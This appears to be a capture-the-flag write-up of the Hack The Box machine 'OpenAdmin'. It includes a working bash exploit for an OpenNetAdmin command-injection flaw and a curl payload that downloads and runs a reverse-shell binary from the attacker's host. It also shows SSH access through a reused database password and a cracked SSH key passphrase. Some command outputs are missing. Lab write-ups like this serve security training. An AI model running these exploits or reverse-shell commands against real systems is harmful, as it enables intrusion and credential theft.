$ sudo nmap -p- -sS 10.10.10.171 -oA nmap_ports [sudo] password for noraj: Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-13 10:45 CET Nmap scan report for 10.10.10.171 Host is up (0.025s latency). Not shown: 65533 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 31.23 seconds
$ sudo nmap -p 80,22 -sSCV 10.10.10.171 -oA nmap_services Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-13 10:46 CET Nmap scan report for 10.10.10.171 Host is up (0.024s latency).
PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 4b:98:df:85:d1:7e:f0:3d:da:48:cd:bc:92:00:b7:54 (RSA) | 256 dc:eb:3d:c9:44:d1:18:b1:22:b4:cf:de:bd:6c:7a:54 (ECDSA) |_ 256 dc:ad:ca:3c:11:31:5b:6f:e6:a4:89:34:7c:9b:e5:50 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 8.89 seconds
At some point I got bored of the pseudo-shell via the RCE exploit so I decided
to get a meterpreter reverse shell. A better reason is that we can't use
interactive client such a mysql client from the RCE so we need a real shell.
The RCE exploit is pretty simple:
1 2 3 4 5 6 7
#!/bin/bash
URL="${1}" whiletrue;do echo -n "$ "; read cmd curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";${cmd};echo \"END\"&xajaxargs[]=ping""${URL}" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1 done
So to upload an execute my reverse shell I tried:
1
curl --silent -d "xajax=window_submit&xajaxr=1574117726710&xajaxargs[]=tooltips&xajaxargs[]=ip%3D%3E;echo \"BEGIN\";wget http://10.10.15.151:443/80.bin; chmod +x 80.bin; ./80.bin ;echo \"END\"&xajaxargs[]=ping""http://10.10.10.171/ona/login.php" | sed -n -e '/BEGIN/,/END/ p' | tail -n +2 | head -n -1
The shell wasn't executed because we can't chmod +x for whatever reason.
So I tried a trick to execute the shell:
/lib64/ld-linux-x86-64.so.2 /opt/ona/www/80.bin but it didn't work.
We can see the public web server listening on all interfaces on port 80, the SSH
server, the internally exposed database on port 3306, but what's running on port
52846? Seems it's a web server.
There is a login page on 127.0.0.1:52846, let's try to login with the creds we
found on the database.
1
curl -X POST http://127.0.0.1:52846/index.php --data 'username=admin&password=admin&login=Submit'
I obtain a Wrong username or password. :(
But if take a look at the owner of the internal website, it seems it's jimmy:
1 2 3 4 5 6
www-data@openadmin:/var/www$ ls -lh ls -lh total 8.0K drwxr-xr-x 6 www-data www-data 4.0K Nov 22 15:59 html drwxrwx--- 2 jimmy internal 4.0K Mar 13 15:53 internal lrwxrwxrwx 1 www-data www-data 12 Nov 21 16:07 ona -> /opt/ona/www
It could be helpful to read the source code but with www-data we are not in
the internal group so we need to connect as jimmy to read the source code.
A big guessing step involved here: we needed to re-use the MySQL ona_sys user
password (n1nj4W4rri0R!) as jimmy PAM password for ssh.
I think the idea was credentials stuffing if jimmy is the dev of the internal
web app he may have reused his own personal password for dev purpose like the
DB.
Now cen can connect and look at the source code:
1 2 3 4 5 6 7 8 9 10
$ ssh jimmy@10.10.10.171
jimmy@openadmin:~$ ls -la /var/www/internal/ total 20 drwxrwx--- 2 jimmy internal 4096 Mar 13 15:53 . drwxr-xr-x 4 root root 4096 Nov 22 18:15 .. -rwxrwxr-x 1 jimmy internal 3229 Nov 22 23:24 index.php -rwxrwxr-x 1 jimmy internal 185 Nov 23 16:37 logout.php lrwxrwxrwx 1 jimmy jimmy 17 Mar 13 15:53 lol -> /var/www/html/lol -rwxrwxr-x 1 jimmy internal 339 Nov 23 17:40 main.php
We could also have look at main.php directly on the file system too but I
wanted to follow the application logic.
It seems we have a private key from joanna user, which is encrypted and
password protected but we also have a hint to crack it:
Don't forget your "ninja" password.
$ ssh2john id_rsa /usr/bin/ssh2john:103: DeprecationWarning: decodestring() is a deprecated alias since Python 3.1, use decodebytes() data = base64.decodestring(data) id_rsa:$sshng$1$16$2AF25344B8391A25A9B318F3FD767D6D$1200$906d14608706c9ac6ea6342a692d9ed47a9b87044b94d72d5b61df25e68a5235991f8bac883f40b539c829550ea5937c69dfd2b4c589f8c910e4c9c030982541e51b4717013fafbe1e1db9d6331c83cca061cc7550c0f4dd98da46ec1c7f460e4a135b6f1f04bafaf66a08db17ecad8a60f25a1a095d4f94a530f9f0bf9222c6736a5f54f1ff93c6182af4ad8a407044eb16ae6cd2a10c92acffa6095441ed63215b6126ed62de25b2803233cc3ea533d56b72d15a71b291547983bf5bee5b0966710f2b4edf264f0909d6f4c0f9cb372f4bb323715d17d5ded5f83117233976199c6d86bfc28421e217ccd883e7f0eecbc6f227fdc8dff12ca87a61207803dd47ef1f2f6769773f9cb52ea7bb34f96019e00531fcc267255da737ca3af49c88f73ed5f44e2afda28287fc6926660b8fb0267557780e53b407255dcb44899115c568089254d40963c8511f3492efe938a620bde879c953e67cfb55dbbf347ddd677792544c3bb11eb0843928a34d53c3e94fed25bff744544a69bc80c4ffc87ffd4d5c3ef5fd01c8b4114cacde7681ea9556f22fc863d07a0f1e96e099e749416cca147add636eb24f5082f9224e2907e3464d71ae711cf8a3f21bd4476bf98c633ff1bbebffb42d24544298c918a7b14c501d2c43534b8428d34d500537f0197e75a4279bbe4e8d2acee3c1586a59b28671e406c0e178b4d29aaa7a478b0258bde6628a3de723520a66fb0b31f1ea5bf45b693f868d47c2d89692920e2898ccd89710c42227d31293d9dad740791453ec8ebfb26047ccca53e0a200e9112f345f5559f8ded2f193feedd8c1db6bd0fbfa5441aa773dd5c4a60defe92e1b7d79182af16472872ab3c222bdd2b5f941604b7de582b08ce3f6635d83f66e9b84e6fe9d3eafa166f9e62a4cdc993d42ed8c0ad5713205a9fc7e5bc87b2feeaffe05167a27b04975e9366fa254adf511ffd7d07bc1f5075d70b2a7db06f2224692566fb5e8890c6e39038787873f21c52ce14e1e70e60b8fca716feb5d0727ac1c355cf633226c993ca2f16b95c59b3cc31ac7f641335d80ff1ad3e672f88609ec5a4532986e0567e169094189dcc82d11d46bf73bc6c48a05f84982aa222b4c0e78b18cceb15345116e74f5fbc55d407ed9ba12559f57f37512998565a54fe77ea2a2224abbddea75a1b6da09ae3ac043b6161809b630174603f33195827d14d0ebd64c6e48e0d0346b469d664f89e2ef0e4c28b6a64acdd3a0edf8a61915a246feb25e8e69b3710916e494d5f482bf6ab65c675f73c39b2c2eecdca6709188c6f36b6331953e3f93e27c987a3743eaa71502c43a807d8f91cdc4dc33f48b852efdc8fcc2647f2e588ae368d69998348f0bfcfe6d65892aebb86351825c2aa45afc2e6869987849d70cec46ba951c864accfb8476d5643e7926942ddd8f0f32c296662ba659e999b0fb0bbfde7ba2834e5ec931d576e4333d6b5e8960e9de46d32daa5360ce3d0d6b864d3324401c4975485f1aef6ba618edb12d679b0e861fe5549249962d08d25dc2dde517b23cf9a76dcf482530c9a34762f97361dd95352de4c82263cfaa90796c2fa33dd5ce1d889a045d587ef18a5b940a2880e1c706541e2b523572a8836d513f6e688444af86e2ba9ad2ded540deadd9559eb56ac66fe021c3f88c2a1a484d62d602903793d10d
$ john --wordlist=/usr/share/wordlists/password/rockyou.txt john.txt Warning: detected hash type "SSH", but the string is also recognized as "ssh-opencl" Use the "--format=ssh-opencl" option to force loading these as that type instead Using default input encoding: UTF-8 Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64]) Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes Cost 2 (iteration count) is 1 for all loaded hashes Will run 2 OpenMP threads Note: This format may emit false positives, so it will keep trying even after finding a possible candidate. Press 'q' or Ctrl-C to abort, almost any other key for status bloodninjas (id_rsa) Warning: Only 1 candidate left, minimum 2 needed for performance. 1g 0:00:00:08 DONE (2020-03-13 17:35) 0.1237g/s 1774Kp/s 1774Kc/s 1774KC/s *7¡Vamos! Session completed
The password is bloodninjas to unlock the private key of joanna.